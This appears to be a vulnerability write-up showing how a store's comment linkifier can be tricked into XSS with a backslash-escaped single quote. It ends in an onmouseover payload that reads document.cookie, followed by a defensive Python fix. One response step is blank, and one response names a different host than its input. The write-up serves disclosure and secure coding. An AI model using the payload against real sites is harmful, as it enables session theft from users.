Bypassing XSS Filtering at Anchor Tag


Severity: High

Weakness: improper filtering of anchor attribute

Complexity: Medium

Steps to Reproduce:

  1. https://site.com/store/ hosts a store where users post their tools, with an option to review a tool by commenting on it.
  • If we write a review like:
Hey Nice Tool http://test.com
  • the application automatically wraps the URL in an anchor tag:
<p>Hey Nice Tool</p><a href="http://test.com" target="blank">http://test.com</a>
  • So I started playing with the anchor tag to find something.
  • Trying with a double quotation mark:

— — — — — — — — — — — — — — — — — — — — — — — — — — — — -

http://test.com"
  • Response:
<a href="http://test.com&#34;" target="blank">http://test.com</a>

The application properly encodes double quotes.

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — -

  • Trying with a single quotation mark:
http://test.com'
  • Response:
<a href="http://test.com'" target="blank">http://test.com</a>
  • The single quotation mark is allowed through unencoded.

— — — — — — — — — — — — — — — — — — — — — — — — — — — —

  • After trying a lot of ways to get rid of href.
  • Tried adding a backslash \ before the single quotation mark ':
http://test.com\'
  • Response:
<a href="http://site.com\" '="" target="blank">http://site.com\'</a>

The response kept the backslash inside href and pushed the single quote outside of it, so the parser treats the single quote as a new, empty attribute (' = "").

https://google.com\'
  • Response:

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — -

Final Payload:

https://google.com\'onmouseover='prompt(document.cookie)'

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

By making the application believe a new attribute starts there, the href attribute inside the anchor tag is closed early and the attacker-controlled text that follows is parsed as further attributes.
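The root cause above is a linkifier that encodes one quote character but not the other, and then lets a backslash move the quote past the end of the href value. The fix is to validate the candidate URL and to encode every attribute-significant character (`&`, `<`, `>`, `"` and `'`) no matter which quote delimits the attribute. The following is an added example written for this write-up, not the vulnerable application's code; the regexes, the hostname allowlist and the function names are my own assumptions about how such a comment linkifier could be built.

```python
import html
import re
from typing import Optional
from urllib.parse import urlsplit

# Candidate URL: http(s) scheme followed by any run of non-whitespace. Kept deliberately
# greedy so that quotes and backslashes land inside the candidate and must survive
# validation and encoding instead of leaking past the end of the href value.
URL_RE = re.compile(r"https?://\S+")
# Conservative ASCII hostname allowlist (assumption: no IDN hosts needed).
HOST_RE = re.compile(r"^[a-z0-9.-]+$")
ALLOWED_SCHEMES = {"http", "https"}


def validate_url(candidate: str) -> Optional[str]:
    """Return the candidate unchanged if it parses as an http(s) URL with a plain hostname, else None."""
    try:
        parts = urlsplit(candidate)
        host = parts.hostname
    except ValueError:
        return None
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not host or not HOST_RE.match(host):
        return None
    return candidate


def render_anchor(url: str) -> str:
    """Build the anchor. html.escape(quote=True) encodes & < > " and ', so the href value
    cannot terminate early regardless of which quote character delimits the attribute."""
    href = html.escape(url, quote=True)
    text = html.escape(url, quote=True)
    return f'<a href="{href}" target="_blank" rel="noopener noreferrer">{text}</a>'


def linkify(comment: str) -> str:
    """HTML-encode the whole comment, turning validated http(s) URLs into anchors."""
    out, pos = [], 0
    for m in URL_RE.finditer(comment):
        out.append(html.escape(comment[pos:m.start()], quote=True))
        candidate = m.group(0)
        if validate_url(candidate) is None:
            # Not a well-formed link: render it as inert, fully encoded text.
            out.append(html.escape(candidate, quote=True))
        else:
            out.append(render_anchor(candidate))
        pos = m.end()
    out.append(html.escape(comment[pos:], quote=True))
    return "".join(out)


if __name__ == "__main__":
    # Constructed inputs, including the review strings from the write-up above.
    for sample in (
        "Hey Nice Tool http://test.com",
        "http://test.com\\'",
        "https://google.com\\'onmouseover='prompt(document.cookie)'",
    ):
        print(linkify(sample))
```

Run as a script it prints the rendered HTML for each sample: the plain review becomes an anchor, while the two quote-bearing strings fail hostname validation and are emitted as encoded text with no quote character left unescaped. Note that the application's own output used `target="blank"`, which names a browsing context called "blank" rather than requesting a new tab; `_blank` plus `rel="noopener noreferrer"` is the intended form.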
